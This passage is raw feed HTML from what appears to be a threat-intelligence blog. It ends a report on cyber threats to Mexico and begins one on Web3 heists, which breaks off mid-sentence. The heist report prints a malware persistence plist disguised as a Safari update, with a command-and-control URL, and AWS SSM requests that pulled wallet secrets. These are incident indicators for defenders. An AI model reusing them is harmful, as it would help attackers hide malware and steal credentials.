style="vertical-align: baseline;">Cyber crime represents a common, moderate-impact threat to Mexico. Notably, we have observed a variety of operations, including ransomware and extortion, targeting of banking credentials, cryptomining, and threat actors offering compromised access and/or credentials for sale. TAG continues to detect and disrupt multiple financially motivated groups targeting users and organizations in Mexico. Of these groups, three of the top four most frequently observed groups in the past year have been initial access brokers for extortion groups. Mandiant observed evidence of threat actors using a variety of initial access vectors, including phishing, malvertising, infected USB drives, and password spray. This initial access subsequently supported threat activity including ransomware and extortion operations, cryptomining, and threat actors offering compromised access and/or credentials for sale.</span></p> <p><span style="vertical-align: baseline;">Like other countries in the region, Mexico is affected by threat activity from actors primarily active in Latin America as well as operations with global reach. A significant amount of observed campaigns focus on stealing credentials for banking or other financial accounts, including use of banking trojans such as METAMORFO aka "Horabot," BBtok, and JanelaRAT. Many threat actors in the Latin American underground appear to focus on simpler operations in which they can quickly and easily generate profits, such as payment card theft and fraud.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig2.max-1000x1000.png" alt="Financially motivated actors most frequently observed in Mexico"> </a> <figcaption class="article-image__caption "><p data-block-key="3122z">Figure 2: Financially motivated actors most frequently observed in Mexico, Q3 2022 – Q2 2024</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Extortion's Impact on Mexico</span></h3> <p><span style="vertical-align: baseline;">Extortion operations, including ransomware, multifaceted ransomware, and extortion, continue to affect organizations across regions and industries, including Mexico, leading to significant financial losses and business disruption. For detailed guidance on defensive strategies for ransomware, please see our blog post: </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span style="text-decoration: underline; vertical-align: baseline;">Ransomware Protection and Containment Strategies: Practical Guidance for Hardening and Protecting Infrastructure, Identities, and Endpoints</span></a><span style="vertical-align: baseline;"> and the accompanying </span><a href="https://services.google.com/fh/files/misc/ransomware-protection-and-containment-strategies-report-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">white paper</span></a><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">Mandiant tracks multiple data leak sites (DLSs) dedicated to releasing victim data following ransomware and/or extortion incidents in which victims refuse to pay a ransom demand. From January 2023 to July 2024, Mexico was surpassed only by Brazil as the Latin American and Caribbean country most affected by ransomware and extortion operations, based on counts of DLS listings, though the global distribution of extortion activity as indicated by DLS listings remains heavily skewed towards the U.S., Canada, and Western Europe. The most frequently impacted sectors in Mexico include manufacturing, technology, financial services, and government. DLSs that most often listed Mexican organizations include LockBit, ALPHV, and 8BASE.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig3.max-1000x1000.png" alt="Data leak listings for Mexican organizations by industry"> </a> <figcaption class="article-image__caption "><p data-block-key="in0sg">Figure 3: Data leak listings for Mexican organizations by industry</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Impersonating Official Government Services to Distribute Malware </span></h3> <p><span style="vertical-align: baseline;">Malware distribution campaigns targeting users in Mexico frequently use tax- and finance-themed lures to convince recipients to open malicious links or files. Throughout 2023 and into 2024, Mandiant observed UNC4984 activity distributing either malicious browser extensions or the SIMPLELOADER downloader using multiple distribution vectors, including using email lures for malware distribution. The malicious websites leveraged in these campaigns often masquerade as tax- or financial-related Chilean or Mexican government websites, and the malicious browser extensions specifically target Mexican bank institutions.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig4.max-1000x1000.png" alt="UNC4984 website spoofing the Mexican Tax Administration Service (SAT) prompting users to download a malicious browser extension"> </a> <figcaption class="article-image__caption "><p data-block-key="in0sg">Figure 4: UNC4984 website spoofing the Mexican Tax Administration Service (SAT) prompting users to download a malicious browser extension</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Another financially motivated group, tracked as UNC5176, uses emails and malicious advertisement (aka "malvertising") campaigns to compromise users from various countries, including Brazil, Mexico, Chile, and Spain. Mandiant observed multiple malicious email campaigns delivering the URSA (aka Mispadu) backdoor to Latin American organizations in multiple industries, including a December 2023 UNC5176 campaign spoofing Mexico's state-owned electric utility, the Comisión Federal de Electricidad. In April 2024, an UNC5176 phishing campaign distributed URSA to organizations primarily located in Latin America using malicious PDF attachments containing an embedded link to a ZIP archive. In some incidents, the ZIP archives were hosted and retrieved from legitimate file-hosting services such as S3 buckets, Azure, Github, and Dropbox.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/threats-targeting-mexico-fig5.max-1000x1000.png" alt="Screenshot of phishing email"> </a> <figcaption class="article-image__caption "><p data-block-key="in0sg">Figure 5: Screenshot of phishing email</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><em><strong><span style="vertical-align: baseline;">Using Threat Intelligence to Protect Users and Customers</span></strong></em></p> <p>Google uses the results of our research to improve the safety and security of our products, making them secure by default. Chrome OS has built-in, proactive security measures to protect from ransomware attacks, and there have been <a href="https://cloud.google.com/blog/products/chrome-enterprise/chrome-os-ransomware?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">no reported ransomware attacks ever</span></a><span style="vertical-align: baseline;"> on any Chrome OS device. Google security teams continuously monitor for new threat activity, and all identified websites and domains are added to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Safe Browsing</span></a><span style="vertical-align: baseline;"> to protect users from further exploitation. We also deploy and constantly update Android detections to protect users' devices and prevent malicious actors from publishing malware to the Google Play Store. We send targeted Gmail and Workspace users </span><a href="https://support.google.com/a/answer/9007870?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">government-backed attacker alerts</span></a><span style="vertical-align: baseline;">, notifying them of the activity and highly encouraging device updates and the use of </span><a href="https://security.googleblog.com/2021/06/new-protections-for-enhanced-safe.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Enhanced Safe Browsing</span></a><span style="vertical-align: baseline;"> for Chrome. Additionally, Google Cloud customers can access insight into these threats through our </span><a href="https://cloud.google.com/blog/products/identity-security/introducing-google-threat-intelligence-actionable-threat-intelligence-at-google-scale-at-rsa"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence</span></a><span style="vertical-align: baseline;"> product announced earlier this year.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <h2><span style="vertical-align: baseline;">Conclusion </span></h2> <p><span style="vertical-align: baseline;">Mexico will remain an attractive target for threat actors driven by diverse motivations. Global cyber espionage actors from the PRC, North Korea, and Russia as well as multinational cyber criminals pose longstanding threats. To effectively safeguard Mexican enterprises and users, it is important to understand this unique interplay of threats and adopt a proactive approach to cybersecurity.</span></p> <p><span style="vertical-align: baseline;">We hope the analysis and research here helps to inform defenders in Mexico, providing fresh insights for collective defense. At Google, we are committed to supporting the safety and security of online users everywhere and will continue to take action to disrupt malicious activity to protect our users and enterprise customers and help make the internet safe for all.</span></p></div></description><pubDate>Tue, 10 Sep 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-mexico/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Insights on Cyber Threats Targeting Users and Enterprises in Mexico</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-mexico/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Threat Analysis Group </name><title></title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>DeFied Expectations — Examining Web3 Heists</title><link>https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/</link><description><div class="block-paragraph_advanced"><p>Written by: Robert Wallace, Blas Kojusner, Joseph Dobson</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Where money goes, crime follows. The rapid growth of Web3 has presented new opportunities for threat actors, especially in decentralized finance (</span><a href="https://www.coinbase.com/learn/crypto-basics/what-is-defi" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">DeFi</span></a><span style="vertical-align: baseline;">), where the heists are larger and more numerous than anything seen in the traditional finance sector. Mandiant has a long history of investigating bank heists. In 2016, Mandiant investigated the world's </span><a href="https://www.nytimes.com/interactive/2018/05/03/magazine/money-issue-bangladesh-billion-dollar-bank-heist.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">largest bank heist</span></a><span style="vertical-align: baseline;"> that occurred at the Bank of Bangladesh and resulted in the theft of $81 million by North Korea's APT38. While the group's operations were quite innovative and made for an entertaining </span><a href="https://www.bbc.co.uk/programmes/w13xtvg9/episodes/downloads" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">10-episode podcast by the BBC</span></a><span style="vertical-align: baseline;">, it pales in comparison to Web3 heists. In 2022, the largest DeFi heist occurred on Sky Mavis' Ronin Blockchain, which resulted in the theft of over </span><a href="https://www.ft.com/content/dec696d4-fd51-4cce-bbd9-1dee911eb4cd" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">$600 million by North Korean threat actors</span></a><span style="vertical-align: baseline;">. While North Korea is arguably the world's leading </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">cyber criminal enterprise</span></a><span style="vertical-align: baseline;">, they are not the only player. Since 2020, there have been hundreds of Web3 heists reported, which has resulted in over $12 billion in stolen digital assets</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig0.max-1000x1000.png" alt="Chainalysis 2024 Crypto Crime Report"> </a> <figcaption class="article-image__caption "><p data-block-key="7iyiz">Source: Chainalysis 2024 Crypto Crime Report</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While </span><a href="https://twitter.com/The_PeopleDAO/status/1634518915668668416?s=20" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">social engineering</span></a><span style="vertical-align: baseline;">, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/solana-cryptocurrency-stolen-clinksink-drainer-campaigns/?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">crypto drainers</span></a><span style="vertical-align: baseline;">, </span><a href="https://rekt.news/zkasino-rekt/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">rug pulls</span></a><span style="vertical-align: baseline;"> (scams), and </span><a href="https://rekt.news/ftx-yikes/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">frauds</span></a><span style="vertical-align: baseline;"> abound, the most impactful Web3 incidents typically involve theft of crypto wallet keys from organizations (e.g., crypto exchanges), smart contract exploits, and occasionally </span><a href="https://web.archive.org/web/20211229074029/https://badger.com/technical-post-mortem" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">web frontend attacks that divert user funds</span></a><span style="vertical-align: baseline;">.</span></p> <h2><span style="vertical-align: baseline;">Crypto Exchange Heists</span></h2> <p><span style="vertical-align: baseline;">Crypto exchanges are valuable targets for sophisticated cyber criminals. One of the earliest and perhaps most notable exchange heists occurred in February 2014 when </span><a href="https://cointelegraph.com/learn/the-mt-gox-bitcoin-heist%5C" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Mt. Gox lost approximately $350 million</span></a><span style="vertical-align: baseline;"> worth of bitcoin (BTC). Since that time, there have been numerous attacks on exchanges. More recently, in May 2024, the </span><span style="vertical-align: baseline;">Japanese crypto exchange DMM Bitcoin had over </span><a href="https://www.coindesk.com/business/2024/06/05/crypto-exchange-dmm-bitcoin-to-raise-320m-to-pay-back-hack-victims/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">$300 million stolen</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Crypto exchange heists typically involve a series of events that map to the </span><a href="https://www.mandiant.com/resources/insights/targeted-attack-lifecycle" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Targeted Attack Lifecycle</span></a><span style="vertical-align: baseline;">. Recent findings from Mandiant heist investigations have identified social engineering of developers via fake job recruiting with coding tests as a common initial infection vector. The following screenshots (Figure 1) are from a recent heist investigation where an engineer was contacted about a fake job opportunity via LinkedIn by a DPRK threat actor. After an initial chat conversation, the attacker sent a ZIP file that contained </span><span style="vertical-align: baseline;">COVERTCATCH</span><span style="vertical-align: baseline;"> malware disguised as a </span><a href="https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Python coding challenge</span></a><span style="vertical-align: baseline;">, which compromised the user’s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/web3-heists-fig1a.max-1000x1000.png" alt="Fake job opportunity"> </a> <figcaption class="article-image__caption "><p data-block-key="o9llw">Figure 1: Fake job opportunity</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">DPRK social engineering efforts have also targeted Finance personnel. Recently, Mandiant observed a similar recruiting theme which delivered a malicious PDF disguised as a job description for “VP of Finance and Operations” at a prominent crypto exchange. The malicious PDF dropped a second-stage malware known as </span><span style="vertical-align: baseline;">RUSTBUCKET</span><span style="vertical-align: baseline;"> which is a backdoor written in Rust that supports file execution. The backdoor collects basic system information, communicates to a URL provided via the command-line, and in this instance persisted, via a Launch Agent disguised as “Safari Update” with a <span style="vertical-align: baseline;">command-and-control (C2 or C&amp;C)</span> domain </span><code style="vertical-align: baseline;">autoserverupdate[.]line[.]pm</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">&lt;?xml version="1.0" encoding="UTF-8"?&gt;<br/></code><code style="vertical-align: baseline;"> &lt;!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" <br/>"http://www.apple.com/DTDs/PropertyList-1.0.dtd"&gt;<br/></code><code style="vertical-align: baseline;"> &lt;plist version="1.0"&gt;<br/></code><code style="vertical-align: baseline;"> &lt;dict&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;Label&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;string&gt;</code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">com.apple.safariupdate</span></code><code style="vertical-align: baseline;">&lt;/string&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;RunAtLoad&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;true/&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;LaunchOnlyOnce&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;true/&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;KeepAlive&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;true/&gt;<br/></code><code style="vertical-align: baseline;"> &lt;key&gt;ProgramArguments&lt;/key&gt;<br/></code><code style="vertical-align: baseline;"> &lt;array&gt;<br/></code><code style="vertical-align: baseline;"> &lt;string&gt;</code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">/Users/REDACTED/Library/Application Support/Safari Update</span></code><code style="vertical-align: baseline;">&lt;/string&gt;<br/></code></p> <p><code style="vertical-align: baseline;">&lt;string&gt;</code><code style="vertical-align: baseline;"><span style="background-color: #f9ab00;">https://autoserverupdate.line[.]pm/qp5FV6ilCJf</span><br/><span style="background-color: #f9ab00;">/Q5wWzIY5%2BSEE07MzxS/TMbSBM7BiR/DIUDMurOYs/xoG5A%3D%3D</span></code><code style="vertical-align: baseline;">&lt;/string&gt;<br/></code><code style="vertical-align: baseline;"> &lt;/array&gt;<br/></code><code style="vertical-align: baseline;"> &lt;/dict&gt;<br/></code><code style="vertical-align: baseline;"> &lt;/plist&gt;</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 2: <span style="vertical-align: baseline;">Launch Agent PLIST file used for persistence of RUSTBUCKET malware</span></span></div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">DPRK threat actors do not rely solely on social engineering when targeting Web3 organizations. They have also been observed conducting supply chain attacks to establish an initial foothold such as the attacks on </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain"><span style="text-decoration: underline; vertical-align: baseline;">JumpCloud</span></a><span style="vertical-align: baseline;"> and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/3cx-software-supply-chain-compromise"><span style="text-decoration: underline; vertical-align: baseline;">3CX</span><span style="vertical-align: baseline;"> in 2023 which targeted their downstream customers that provide cryptocurrency services</span></a><span style="vertical-align: baseline;">. Once a foothold is established via malware, the attackers pivot to password managers to steal credentials, perform internal reconnaissance via code repos and documentation, and pivot into the cloud hosting environment to reveal hot wallet keys and eventually drain funds. </span></p> <p><span style="vertical-align: baseline;">The following snippet shows example decrypted </span><a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-parameter-store.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AWS EC2 SSM Parameters</span></a><span style="vertical-align: baseline;"> identified in </span><a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/parameter-store-logging-auditing.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AWS CloudTrail</span></a><span style="vertical-align: baseline;"> logs from a heist investigation. These decrypted SSM Parameters included the private keys, usernames, and passwords for an exchange’s production cryptocurrency wallets. Approximately one hour later the wallets were drained resulting in a loss of over $100 million.</span></p></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><code style="vertical-align: baseline;">{"name":"/prod/wallets/wallets-password","withDecryption":true}<br/></code><code style="vertical-align: baseline;">{"name":"/prod/wallets/signing-svc/db/user","withDecryption":true}<br/></code><code style="vertical-align: baseline;">{"name":"/prod/wallets/signing-svc/db/password","withDecryption":true}<br/></code><code style="vertical-align: baseline;">{"name":"/prod/wallets/eth/db/password","withDecryption":true}<br/></code><code style="vertical-align: baseline;">{"name":"/prod/wallets/btc/db/password","withDecryption":true}</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 3: Example AWS SSM Parameter Store Requests related to cryptocurrency wallets</span></span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">While a heist may seem fast given the sudden losses, Mandiant has observed crypto exchange attacks with </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/m-trends-2024"><span style="text-decoration: underline; vertical-align: baseline;">dwell times</span></a><span style="vertical-align: baseline;"> of up to 12 months, indicating a significant opportunity for improved threat detection to prevent heists. Exchanges that have detected attacks early in the attack lifecycle have been successful at thwarting heists. To learn more about crypto exchange heists, check out this upcoming presentation “</span><a href="https://mwise.mandiant.com/conf24/session/2321452/from-job-interview-to-crypto-heist-how-north-korea-sponsored-threat-actor-stole-million-dollars-of-crypto-currency" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">From Job Interview to Crypto Heist</span></a><span style="vertical-align: baseline;">” at the </span><a href="https://mwise.mandiant.com/conf24" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">mWISE Conference</span><span style="vertical-align: baseline;"> in Denver, September 18-19</span></a>.</p> <h2><span style="vertical-align: baseline;">Smart Contract Exploits</span></h2> <p><span style="vertical-align: baseline;">Smart contracts are code that run on a blockchain that are typically open source, decentralized, immutable, and permissionless. Their code is often transparent and publicly verifiable, which means that any interested party can see exactly what logic a smart contract follows when it receives digital assets. Exploiting smart contracts typically involves finding flaws in the code's logic in order to steal the underlying assets – no credential theft, malware, or C2 infrastructure required. </span></p> <p><span style="vertical-align: baseline;">Smart contracts are invoked anytime one wants to request a computation within a blockchain network. Well-known networks that employ smart contract technology include Ethereum, Tron, and Solana. Smart contracts can be used to support arbitrarily complex user-facing apps and services such as marketplaces, financial utilities, and games. Any developer can create a smart contract and deploy it by paying a fee to the network. Any user can then pay a fee to the network to call the smart contract to execute its code.</span></p> <p><span style="vertical-align: baseline;">The programming language behind a smart contract typically depends on the network where it will be deployed. </span><a href="https://soliditylang.org/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Solidity</span></a><span style="vertical-align: baseline;"> is the most popular programming language used to develop smart contracts on the Ethereum network. Other networks may involve different systems that require the use of other programming languages such as Python for Algorand and Rust for Solana. Once a smart contract is ready to be deployed, it is compiled into bytecode. The bytecode is decentralized and transparent; therefore, even if the high-level code used to compile a contract is unavailable, the bytecode is publicly available and can be decompiled to see the functions present in the contract.</span></p> <p><span style="vertical-align: baseline;">A fundamentally sound understanding of the programming language is essential when developing smart contracts as they are heavily targeted due their financial nature. Good smart contract practices can also overlap with traditional secure programming practices like implementing safe libraries to perform arithmetic; however, smart contracts possess unique behaviors that open them up to their own subset of challenges.</span></p> <h3><span style="vertical-align: baseline;">Reentrancy Attack</span></h3> <p><span style="vertical-align: baseline;">Smart contracts can interact with other smart contracts in the network by performing an external call. External calls should be treated as untrusted since the behavior of an external contract is not always guaranteed, regardless if the external contract is known good, since the external contract itself could unwillingly execute malicious code via an external call of its own. It is because of this that smart contract developers should ensure there is nothing critical being done after an external call is executed.</span></p> <p><span style="vertical-align: baseline;">The first, and perhaps most widely known, smart contract exploit occurred in June 2016 when </span><a href="https://www.gemini.com/cryptopedia/the-dao-hack-makerdao" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">The DAO was hacked for $55 million</span></a><span style="vertical-align: baseline;"> worth of Ether (ETH). While much has been </span><a href="https://decrypt.co/41952/book-sheds-new-light-on-ethereums-55-million-dao-hack" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">written</span></a><span style="vertical-align: baseline;"> about that heist, the perpetrator remains a mystery. The hack utilized a technique now known as a "</span><a href="https://blog.chain.link/reentrancy-attacks-and-the-dao-hack/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reentrancy attack,</span></a><span style="vertical-align: baseline;">" which abused the transfer mechanism that sent ETH before updating its internal state, thus allowing the attacker to create a sequence of recursive calls to siphon funds. This has become a common attack vector for smart contracts that has resulted in the theft of hundreds of millions of dollars in digital assets.</span></p> <h4><span style="vertical-align: baseline;">Curve Finance Hack</span></h4> <p><span style="vertical-align: baseline;">A more recent example of a successful reentrancy attack in the wild came by way of Curve Finance, one of the most-used and influential decentralized exchanges. In July of 2023, </span><a href="https://www.nasdaq.com/articles/after-the-curve-attack:-whats-next-for-defi" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">$70 million was stolen</span></a><span style="vertical-align: baseline;"> via a vulnerability in </span><a href="https://vyperlang.org/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Vyper</span></a><span style="vertical-align: baseline;"> that allowed for reentrancy attacks on older versions (0.2.15, 0.2.16 and 0.3.0).</span><span style="vertical-align: baseline;"> </span></p> <p><span style="vertical-align: baseline;">Reentrancy vulnerabilities can typically be triggered when a state change is performed after an external call. A common target is a contract that allows users to deposit funds to a pool and withdraw 